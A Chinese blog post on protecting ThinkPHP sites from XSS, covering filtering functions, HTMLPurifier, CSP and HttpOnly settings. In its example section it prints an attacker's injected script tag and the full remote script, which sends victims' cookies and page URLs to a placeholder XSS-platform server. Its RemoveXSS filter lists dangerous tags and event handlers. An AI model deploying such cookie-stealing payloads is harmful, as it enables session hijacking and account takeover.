Thinkphp防XSS跨站脚本攻击漏洞

已于 2023-05-13 09:18:23 修改
阅读量2.2k 收藏 7
点赞数 1
分类专栏: # ThinkPHP 文章标签: xss php 安全
于 2023-05-12 01:11:32 首次发布
原文链接:https://blog.csdn.net/ganggang4321/article/details/108051790
版权

目录

一、什么是XSS攻击?

二、XSS攻击的原理

三、XSS攻击的示例

四、如何预防XSS等脚本攻击?

1、PHP直接输出html的,可以采用以下的方法进行过滤:

2、PHP输出到JS代码中,或者开发Json API的,则需要前端在JS中进行过滤:

3、其它的通用的防御手段:

五、thinkphp过滤XSS脚本攻击方法 

六、RemoveXSS函数代码 

七、PHP设置HttpOnly来防御xss攻击

记录:

今天登录我网站的一个测试账号,访问某个页面非常卡,以前是不会这样卡的,使用其他账号访问这个页面却是正常的,非常的纳闷,到底是哪里出了问题呢!排除css和js问题,后面也排除了PHP后端耗时问题,查了很久的原因,才发现是mysql里的数据有问题,字符串变量被黑客写入了下面这行语句:

<sCRiPt sRC=//短链接地址></sCrIpT>

访问这个短链接地址,发现远程执行的xss脚本代码如下:

一、什么是XSS攻击?

XSS(Cross Site Scripting, 跨站脚本攻击), 在 Web攻击中比较常见的方式, 通过此攻击可以控制用户终端做一系列的恶意操作, 如 可以盗取, 篡改, 添加用户的数据或诱导到钓鱼网站等。

上面那段xss脚本代码,主要是为了获取网站cookie,然后实现免密登录其他用户的账号。

二、XSS攻击的原理

比较常见的方式是利用未做好过滤的参数传入一些脚本语言代码块通常是 JavaScript, PHP, Java, ASP, Flash, ActiveX等等, 直接传入到页面或直接存入数据库。通过用户浏览器阅读此数据时可以修改当前页面的一些信息或窃取会话和 Cookie等, 这样完成一次 XSS攻击。

三、XSS攻击的示例

1、比如某个页面被加入了下面这句xss脚本代码:

<sCrIpt srC=//xss脚本短链接地址></sCRipT>

2、xss脚本短链接地址的代码如下图:

(function() {
	(new Image()).src='http://xss平台服务器地址/xss.php?do=api&id=L9iR&location='+escape((function() {
		try {
			return document.location.href
		}
		catch(e) {
			return ''
		}
	}
	)())+'&toplocation='+escape((function() {
		try {
			return top.location.href
		}
		catch(e) {
			return ''
		}
	}
	)())+'&cookie='+escape((function() {
		try {
			return document.cookie
		}
		catch(e) {
			return ''
		}
	}
	)())+'&opener='+escape((function() {
		try {
			return (window.opener && window.opener.location.href)?window.opener.location.href:''
		}
		catch(e) {
			return ''
		}
	}
	)());
}
)();
if(''==1) {
	keep=new Image();
	keep.src='http://xss平台服务器地址xss.php?do=keepsession&id=L9iR&url='+escape(document.location)+'&cookie='+escape(document.cookie)
}
;

3、当用户张三登录网站,并访问了带有这个脚本的页面时,<sCrIpt srC=//xss脚本短链接地址></sCRipT>这个js脚本会自动获取张三账号的cookie,并发送到黑客的xss平台。黑客拿到cookie后,就可以不需要密码,直接登录张三的账号。

四、如何预防XSS等脚本攻击?

1、PHP直接输出html的,可以采用以下的方法进行过滤:

(1).htmlspecialchars函数

(2).htmlentities函数

(3).HTMLPurifier.auto.php插件

(4).RemoveXss函数

2、PHP输出到JS代码中,或者开发Json API的,则需要前端在JS中进行过滤:

(1).尽量使用innerText(IE)和textContent(Firefox),也就是jQuery的text()来输出文本内容

(2).必须要用innerHTML等等函数,则需要做类似php的htmlspecialchars的过滤

3、其它的通用的防御手段:

(1).在输出html时,加上Content Security Policy的Http Header:

作用:可以防止页面被XSS攻击时,嵌入第三方的脚本文件等;

缺陷:IE或低版本的浏览器可能不支持;

(2).在设置Cookie时,加上HttpOnly参数:

作用:可以防止页面被XSS攻击时,Cookie信息被盗取,可兼容至IE6;

缺陷:网站本身的JS代码也无法操作Cookie,而且作用有限,只能保证Cookie的安全;

(3).在开发API时,检验请求的Referer参数

作用:可以在一定程度上防止CSRF攻击;

缺陷:IE或低版本的浏览器中,Referer参数可以被伪造;

五、thinkphp过滤XSS脚本攻击方法 

方法一:在application/config.php添加配置

1、设置全局过滤方法为封装的htmlspecialchars函数,修改application/config.php

// 默认全局过滤方法 多个请用英文逗号分隔(预防跨站脚本XSS攻击)
'default_filter' => 'htmlspecialchars,RemoveXSS',

strip_tags()函数 过滤字符串中的 HTML、XML 以及 PHP 的标签;

htmlspecialchars() 函数 把预定义的字符转换为 HTML 实体,如需把特殊的 HTML 实体转换回字符,请使用 htmlspecialchars_decode() 函数;

注意:如果您需要将html格式文本写入数据库,那么需要使用htmlspecialchars_decode重新编译:

$data=input('post.');
//全局使用htmlspecialchars过滤过input,因此要重新编译成html格式
$content = htmlspecialchars_decode(trim($data['content']));

2、设置cookie,修改application/config.php

    // +----------------------------------------------------------------------
    // | Cookie设置
    // +----------------------------------------------------------------------
    'cookie' => [
        // cookie 名称前缀
        'prefix'    => '',
        // cookie 保存时间(为0时,表示Cookie在浏览器关闭时自动删除)
        'expire'    => 0,
        // cookie 保存路径(斜杠/表示Cookie在整个网站中都可用)
        'path'      => '/',
        // cookie 有效域名(不要加www)
        'domain'    => '.18pay.net',
        //  cookie 启用安全传输 (仅通过安全的HTTPS连接传给客户端)
        'secure'    => true,
        // httponly设置(参数为空,表示Cookie可以通过JavaScript访问)
        'httponly'  => '',
        // 是否使用 setcookie
        'setcookie' => true,
    ],

3、在 application/common.php里添加RemoveXSS函数,RemoveXSS函数代码请参考第六段。

 方法二:使用第三方插件htmlpurifier

1、使用composer安装

$ composer require ezyang/htmlpurifier

 2、在application/common.php公共函数目录中,添加如下代码:

//防止xss攻击的特殊方法
function fanXSS($string) {    
    require_once '../vendor/htmlpurifier/HTMLPurifier.auto.php'; //根据实际目录路径进行修改
    // 生成配置对象
    $cfg = HTMLPurifier_Config::createDefault();    // 以下就是配置:
    $cfg->set('Core.Encoding', 'UTF-8');    // 设置允许使用的HTML标签
    $cfg->set('HTML.Allowed', 'div,h1,h2,h3,h4,h5,embed,video,source,audio,table,td,th,tr,dl,dd,dt,font,u,p,b,strong,i,em,a[href|title],ul,ol,li,br,span[style],img[width|height|alt|src]');    // 设置允许出现的CSS样式属性
    $cfg->set('CSS.AllowedProperties', 'font,font-size,font-weight,font-style,font-family,text-decoration,padding-left,color,background-color,text-align');    // 设置a标签上是否允许使用target="_blank"
    $cfg->set('HTML.TargetBlank', TRUE);    // 使用配置生成过滤用的对象
    $obj = new HTMLPurifier($cfg);    // 过滤字符串
    return $obj->purify($string);
}

3、然后在 application/config.php 配置文件里,default_filter中添加这个过滤方法名

'default_filter'  => 'fanXSS',

4、富文本编辑器内容,使用过滤的思想进行处理,比如商品描述字段,处理如下:

goods['desc'] = input('goods_desc', '', 'fanXSS');

六、RemoveXSS函数代码 

/**
 * 移除或者打乱注入的XSS脚本代码
 */
function RemoveXSS($val) {  
   // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed  
   // this prevents some character re-spacing such as <java\0script>  
   // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs  
   $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);  
     
   // straight replacements, the user should never need these since they're normal characters  
   // this prevents like <IMG SRC=@avascript:alert('XSS')>  
   $search = 'abcdefghijklmnopqrstuvwxyz'; 
   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';  
   $search .= '1234567890!@#$%^&*()'; 
   $search .= '~`";:?+/={}[]-_|\'\\'; 
   for ($i = 0; $i < strlen($search); $i++) { 
      // ;? matches the ;, which is optional 
      // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars 
    
      // @ @ search for the hex values 
      $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ; 
      // @ @ 0{0,7} matches '0' zero to seven times  
      $val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; 
   } 
    
   // now the only remaining whitespace attacks are \t, \n, and \r 
   $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base'); 
   $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); 
   $ra = array_merge($ra1, $ra2); 
    
   $found = true; // keep replacing as long as the previous round replaced something 
   while ($found == true) { 
      $val_before = $val; 
      for ($i = 0; $i < sizeof($ra); $i++) { 
         $pattern = '/'; 
         for ($j = 0; $j < strlen($ra[$i]); $j++) { 
            if ($j > 0) { 
               $pattern .= '(';  
               $pattern .= '(&#[xX]0{0,8}([9ab]);)'; 
               $pattern .= '|';  
               $pattern .= '|(&#0{0,8}([9|10|13]);)'; 
               $pattern .= ')*'; 
            } 
            $pattern .= $ra[$i][$j]; 
         } 
         $pattern .= '/i';  
         $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag  
         $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags  
         if ($val_before == $val) {  
            // no replacements were made, so exit the loop  
            $found = false;  
         }  
      }  
   }  
   return $val;  
}

七、PHP设置HttpOnly来防御xss攻击

1、在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性

2、或者使用以下代码:

ini_set("session.cookie_httponly", 1);

3、或者setcookie()的第七个参数设置为true,如下:

session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

PHP5.1以前的版本,使用如下方式:

header("Set-Cookie: hidden=value; httpOnly");

美奇开发工作室
关注
专栏目录
博客
工作室Github开源项目,走过路过千万别错过哟!
11-02 3848
最近开始使用github仓库管理项目,个人开发的Project都直接开源了,运用到了很多技术栈,非常适用刚入门的新手小白学习参考。如果我的项目对你有所帮助,欢迎给个Star,非常感谢!如代码有不足之处,也可以指出来,大家一起交流学习。
博客
各个开发工具格式化代码的快捷键
07-26 5046
IntelliJ IDEA:Ctrl+Alt+Lphpstorm:Ctrl+Alt+Landroid studio:Ctrl+Alt+Leclipse:Ctrl + Shift + FHBuilder:Ctrl + Shift + FVisual Studio:ctrl+K+F(或者ctrl+K+D)微信小程序工具:Shift+Alt+F之所以收集这些,主要是因为使用的开发工具比较多,经常换着写,一下子就把快捷键给搞混了。...
博客
Thinkphp5在mode模型里查询数据库字段不为空
09-14 623
【代码】Thinkphp5在mode模型里查询数据库字段不为空。
博客
wordpress框架自定义添加page分页功能
07-24 1299
我这个函数是按网站需求做了一些调整和修改,因为我首页只显示三个分类,直接用$wp_query->max_num_pages查总页码的话是不准的,所以你要根据自己的网站数据来调整这个函数的代码。
博客
使用bat处理批量下载表情包图片
07-19 1229
如果是手工一个一个下载的话,要浪费很多时间,我们直接有windows系统上使用bat批处理命令实现。批量下载表情包.bat。批量下载表情包.bat。
博客
PHP解决模拟from表单get跳转时,浏览器提示不安全问题
07-06 816
【代码】PHP解决模拟from表单get跳转时,浏览器提示不安全问题。
博客
html+js自动弹出加QQ群的链接,每天只弹出一次
06-14 1555
【代码】html+js自动弹出加QQ群的链接,每天只弹出一次。
博客
解决windows10打开VMware Workstation的虚拟机就蓝屏问题
06-05 4593
打开虚拟机VMware,点击运行“Windows Server 2008 R2 x64”虚拟机,会提示“需要关闭hyper-V虚拟机才能运行”,因此接下来我们要关闭hyper-V。控制面板 → 程序和功能 → 启动或关闭Windows功能,“Hyper-V”取消勾选,勾选“Windows 虚拟机监控程序平台”和“虚拟机平台”,然后重启电脑。右键桌面的Wmware图标,选择属性 → 兼容性 → 兼容模式,勾选“以兼容模式运行这个程序”,选择Windows 8。☑ Windows 虚拟机监控程序平台。
博客
Thinkphp5根据IP地址获取定位地理位置,精准到城市
05-13 2757
根据IP地址获取用户所在的城市地理位置,网上有很多免费的API接口可以实现,但是接口响应比较慢,接口也受网速等因素影响,有时会很卡很卡,直接给用户造成非常不好的网站流畅度体验。因此,推荐大家直接使用离线IP库进行查询,查询速度快,而且也很准确。1、将cznet.zip上传到Thinkphp的扩展目录extend并解压;
博客
Thinkphp检测Token令牌,防跨站跨账户漏洞
05-11 563
以前真的不懂,也没想明白为什么要检查Token,感觉多此一举,毕竟用户都是要登录网站,才能进行操作,今天才发现自己的想法太天真了!不做Token检测的话,别人只要知道你的接口或者控制器方法名,很容易就可以进行跨站或者跨账户操作,比如张三,可以直接修改李四的登录状态,下面一起来学习如何避免这个漏洞。或者在ajax参数里加上token。2、所有的控制器都要继承这个。
博客
ueditor富文本编辑器上传木马图片或木马文件漏洞
04-27 1650
ueditor插件目录一般都自带index.html文件(完整demo文件),这个文件原来是用来测试插件功能的,但。插件目录下的index.html文件,删除不影响ueditor富文本编辑器的正常功能;
博客
Thinkphp获取项目最近更改变动的所有文件
04-25 602
企业级的网站项目都是要不断优化迭代更新的,做为一名后端程序员,在编写更新模块时,如何能快速获取最近修改的文件,然后打包压缩成更新补丁呢?
博客
CSS美化div滚动条样式
04-25 427
【代码】CSS美化div滚动条样式。
博客
如何无缝切换网站服务器?
03-11 552
三、新服务器的网站部署完成,并且能正常访问后,就是要考虑数据同步的问题了,网站是有用户在使用的,所以不能直接关掉旧服务器,修改的域名DNS也没那么快生效,用户访问的还是旧的服务器,有些站长可能会使用。(3)、将旧服务器网站配置里的数据库IP地址修改成新服务器的IP,目的就是让旧服务器的网站调用新服务器里的数据库,实现数据同步,远程访问其他服务器的数据库,网站相对来说会比较卡,但影响不是很大;四、修改域名DNS,解析到新服务器的IP上,我之前就是忘记了这一步,所以用户才反映说我网站变卡了。
博客
C#将Dictionary字典集合转换为json字符串
03-07 3057
需要引用Newtonsoft.Json.dll库(请自行下载对应的版本)
博客
C# list集合根据对象某个属性进行排序(降序或升序)
02-23 641
用委托和lambda来实现:public List<Vip>vipList = new List<Vip>();//排序vipList.Sort( delegate(Vip st1, Vip st2){ //降序排列 return st2.money.CompareTo(st1.money); //升序排列(颠倒 st1 和 st2 即可) //return st1.money.CompareTo(s.
博客
C#让子窗口紧靠父窗口右边(贴边显示),并随父窗口移动而移动
02-23 1570
C#开发简单又愉快,但随着软件的强大,功能也会越来越多,如果全都是子窗口弹窗显示,会让用户觉得很不友好,看着也不舒服。比较好的开发方案是使用“面板+用户组件”,整个软件就只有一个窗口,但这种方案的前提是要重构布局和代码,对于已经成型的软件,再去做这些工作,估计要花费很多时间。因为我要加的子窗口比较小,为了简单省事,我想直接让子窗口贴靠在父窗口右侧。
博客
使用WordPress快速搭建外贸网站教程
02-23 2780
一、下载安装1、首先前往官方下载wordPress框架,下载地址:Download | WordPress.org建议下载英文版本的,后台也建议安装英文语言的,为什么呢?因为咱们要搭建的是外贸网站,给外国人看的,如果你版本和后台设置为中文的,前台也会自动跟随被翻译成中文,另外比较重要的一点,我之前测试过,如果选择中文的版本,有很多外国的主题模板和插件安装会有问题。2、把下载好的安装包上传到我们的服务器,解压。3、我使用的搭建环境是宝塔Linux CentOS 7.9(Apache2.
博客
腾讯QQ生成二维码图片的api接口
02-18 736
腾讯QQ生成二维码图片的api接口
博客
wordpress修改隐藏默认wp-admin后台登录入口
02-01 2845
WordPress是使用PHP语言开发的博客平台 系统,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress功能非常强大,它不仅仅可以用来做博客网站,通过自定义插件和模板,还可以用作内容管理系统(CMS)和商城系统。WordPress的安全机制做得非常好,被誉为最安全的 CMS 内容管理系统,没有之一。但是,如果你是新手,就很可能会忽略一个漏洞,那就是wordpress的默认后台登录入口,这个漏洞很可能会被黑客利用,进行后台暴力破解。网站域名/wp-login.php。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值